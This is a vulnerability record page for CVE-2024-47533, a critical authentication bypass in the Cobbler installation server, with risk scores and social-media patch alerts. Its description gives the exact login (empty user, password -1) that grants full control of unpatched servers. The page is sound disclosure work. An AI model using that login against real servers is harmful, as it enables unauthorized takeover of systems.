CVE-2024-47533

Published Nov 18, 2024

Last updated 3 months ago

CVSS critical 9.8

Overview

Description
Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
Source
security-advisories@github.com
NVD status
Awaiting Analysis

Risk scores

CVSS 3.1

Type
Secondary
Base score
9.8
Impact score
5.9
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity
CRITICAL

Weaknesses

security-advisories@github.com
CWE-287

Social media

Hype score
Not currently trending

  1. 🚨 A Critical Vulnerability Exists In Cobbler Server (CVE-2024-47533). See the @ncsc_gov_ie advisory for more info: https://t.co/TtCNPR2QPI

    @ncsc_gov_ie

    22 Nov 2024

    207 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  2. 🚨 Security Alert: A critical authentication vulnerability (CVE-2024-47533) in Cobbler allows attackers to bypass authentication and gain full control of the server. Update to versions 3.2.3 or 3.3.7 immediately to secure your system! #Cybersecurity #Ostorlab #Vulnerabilities…

    @OstorlabSec

    21 Nov 2024

    59 Impressions

    2 Retweets

    2 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. Critical: Improper authentication in #Cobbler server. CVE-2024-47533 CVSS: 9.8. Vulnerable prior to versions 3.2.3 and 3.3.7, allowing unauthenticated access and full server control. https://t.co/hwTHNIQR9d #Patch #Patch #Patch

    @CCBalert

    21 Nov 2024

    76 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. CVE-2024-47533 (CVSS 9.8): Cobbler Vulnerability Exposes Linux Servers to Compromise https://t.co/kAnmJQnhtU

    @Dinosn

    20 Nov 2024

    1959 Impressions

    7 Retweets

    18 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  5. Cobbler Vulnerability Exposes #Linux Servers to Compromise CVE-2024-47533 (CVSS 9.8) exposes #Cobbler servers to unauthorized access and control, enabling attackers to manipulate system configurations. https://t.co/IBqG2gmwUF

    @the_yellow_fall

    20 Nov 2024

    17 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  6. CVE-2024-47533 Improper Authentication in Cobbler XML-RPC Allows Full Server Control Cobbler is a tool for setting up Linux installations quickly. From version 3.0.0 to before versions 3.2.3 and 3.3.7, it has a p... https://t.co/sb4R5gwB6S

    @VulmonFeeds

    18 Nov 2024

    39 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

References